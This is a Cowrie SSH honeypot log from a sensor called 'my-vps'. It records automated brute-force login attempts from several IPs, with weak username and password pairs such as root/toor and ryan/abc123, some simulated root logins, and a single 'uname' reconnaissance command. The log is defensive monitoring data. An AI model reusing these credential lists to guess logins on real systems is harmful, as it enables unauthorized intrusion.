{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:03:21.965621Z","src_ip":"51.79.164.132","session":"56bd4131653e"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:03:26.102518Z","src_ip":"51.79.164.132","session":"56bd4131653e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:03:27.408051Z","src_ip":"51.79.164.132","session":"56bd4131653e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:03:27.408728Z","src_ip":"51.79.164.132","session":"56bd4131653e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:03:28.488640Z","src_ip":"51.79.164.132","session":"56bd4131653e"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:03:28.499587Z","src_ip":"51.79.164.132","session":"56bd4131653e"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33178,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a34995292e3","protocol":"ssh","message":"New connection: 51.79.164.132:33178 (1.2.3.4:22) [session: 6a34995292e3]","sensor":"my-vps","timestamp":"2025-08-28T10:03:48.158617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:03:48.312861Z","src_ip":"51.79.164.132","session":"6a34995292e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:03:48.988122Z","src_ip":"51.79.164.132","session":"6a34995292e3"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T10:03:50.623300Z","src_ip":"51.79.164.132","session":"6a34995292e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":5545,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7fdeabe9851","protocol":"ssh","message":"New connection: 212.227.125.160:5545 (1.2.3.4:22) [session: a7fdeabe9851]","sensor":"my-vps","timestamp":"2025-08-28T10:03:51.021143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:03:51.022907Z","src_ip":"212.227.125.160","session":"a7fdeabe9851"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:03:51.106962Z","src_ip":"212.227.125.160","session":"a7fdeabe9851"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"12345","message":"login attempt [ryan/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T10:03:51.848483Z","src_ip":"212.227.125.160","session":"a7fdeabe9851"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:03:52.226533Z","src_ip":"51.79.164.132","session":"6a34995292e3"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abc123","message":"login attempt [ryan/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:03:52.929961Z","src_ip":"212.227.125.160","session":"a7fdeabe9851"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abcd123","message":"login attempt [ryan/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:03:54.012542Z","src_ip":"212.227.125.160","session":"a7fdeabe9851"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abcd1234","message":"login attempt [ryan/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T10:03:55.095429Z","src_ip":"212.227.125.160","session":"a7fdeabe9851"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abc1234","message":"login attempt [ryan/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T10:03:56.235776Z","src_ip":"212.227.125.160","session":"a7fdeabe9851"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:03:57.319138Z","src_ip":"212.227.125.160","session":"a7fdeabe9851"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62786,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fbd0ce0de08","protocol":"ssh","message":"New connection: 217.72.205.35:62786 (1.2.3.4:22) [session: 6fbd0ce0de08]","sensor":"my-vps","timestamp":"2025-08-28T10:04:09.422283Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:04:09.423585Z","src_ip":"217.72.205.35","session":"6fbd0ce0de08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44993,"dst_ip":"1.2.3.4","dst_port":22,"session":"44ad304b9876","protocol":"ssh","message":"New connection: 212.227.235.229:44993 (1.2.3.4:22) [session: 44ad304b9876]","sensor":"my-vps","timestamp":"2025-08-28T10:04:11.566718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:04:11.567717Z","src_ip":"212.227.235.229","session":"44ad304b9876"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:04:12.089457Z","src_ip":"212.227.235.229","session":"44ad304b9876"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"sammy","message":"login attempt [sammy/sammy] failed","sensor":"my-vps","timestamp":"2025-08-28T10:04:12.692741Z","src_ip":"212.227.235.229","session":"44ad304b9876"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abc123","message":"login attempt [sammy/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:04:13.824898Z","src_ip":"212.227.235.229","session":"44ad304b9876"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":42474,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bb87d3da77e","protocol":"ssh","message":"New connection: 51.79.164.132:42474 (1.2.3.4:22) [session: 0bb87d3da77e]","sensor":"my-vps","timestamp":"2025-08-28T10:04:14.810879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:04:14.884046Z","src_ip":"51.79.164.132","session":"0bb87d3da77e"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abcd123","message":"login attempt [sammy/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:04:14.955100Z","src_ip":"212.227.235.229","session":"44ad304b9876"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:04:15.414579Z","src_ip":"51.79.164.132","session":"0bb87d3da77e"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abcd1234","message":"login attempt [sammy/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T10:04:16.084713Z","src_ip":"212.227.235.229","session":"44ad304b9876"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abc1234","message":"login attempt [sammy/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T10:04:17.215019Z","src_ip":"212.227.235.229","session":"44ad304b9876"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:04:17.392053Z","src_ip":"51.79.164.132","session":"0bb87d3da77e"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:04:18.345597Z","src_ip":"212.227.235.229","session":"44ad304b9876"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:04:18.974074Z","src_ip":"51.79.164.132","session":"0bb87d3da77e"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54026,"dst_ip":"1.2.3.4","dst_port":22,"session":"93858cea46c9","protocol":"ssh","message":"New connection: 51.79.164.132:54026 (1.2.3.4:22) [session: 93858cea46c9]","sensor":"my-vps","timestamp":"2025-08-28T10:04:41.334617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:04:41.453520Z","src_ip":"51.79.164.132","session":"93858cea46c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:04:42.011323Z","src_ip":"51.79.164.132","session":"93858cea46c9"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:04:43.591406Z","src_ip":"51.79.164.132","session":"93858cea46c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:04:44.428811Z","src_ip":"51.79.164.132","session":"93858cea46c9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:04:44.429746Z","src_ip":"51.79.164.132","session":"93858cea46c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:04:45.015387Z","src_ip":"51.79.164.132","session":"93858cea46c9"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:04:45.016692Z","src_ip":"51.79.164.132","session":"93858cea46c9"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":58640,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cfa89cf66f4","protocol":"ssh","message":"New connection: 51.79.164.132:58640 (1.2.3.4:22) [session: 2cfa89cf66f4]","sensor":"my-vps","timestamp":"2025-08-28T10:05:08.659057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:05:09.301547Z","src_ip":"51.79.164.132","session":"2cfa89cf66f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:05:09.302535Z","src_ip":"51.79.164.132","session":"2cfa89cf66f4"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:05:12.539568Z","src_ip":"51.79.164.132","session":"2cfa89cf66f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:05:13.183646Z","src_ip":"51.79.164.132","session":"2cfa89cf66f4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:05:13.184428Z","src_ip":"51.79.164.132","session":"2cfa89cf66f4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:05:13.539898Z","src_ip":"51.79.164.132","session":"2cfa89cf66f4"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:05:13.541080Z","src_ip":"51.79.164.132","session":"2cfa89cf66f4"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":52296,"dst_ip":"1.2.3.4","dst_port":22,"session":"4126a7ad74b5","protocol":"ssh","message":"New connection: 51.79.164.132:52296 (1.2.3.4:22) [session: 4126a7ad74b5]","sensor":"my-vps","timestamp":"2025-08-28T10:05:35.521200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:05:35.809073Z","src_ip":"51.79.164.132","session":"4126a7ad74b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:05:35.809780Z","src_ip":"51.79.164.132","session":"4126a7ad74b5"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-28T10:05:39.230551Z","src_ip":"51.79.164.132","session":"4126a7ad74b5"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:05:40.582574Z","src_ip":"51.79.164.132","session":"4126a7ad74b5"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":38614,"dst_ip":"1.2.3.4","dst_port":22,"session":"baaf0c22ea35","protocol":"ssh","message":"New connection: 51.79.164.132:38614 (1.2.3.4:22) [session: baaf0c22ea35]","sensor":"my-vps","timestamp":"2025-08-28T10:06:01.628754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:06:01.841894Z","src_ip":"51.79.164.132","session":"baaf0c22ea35"}
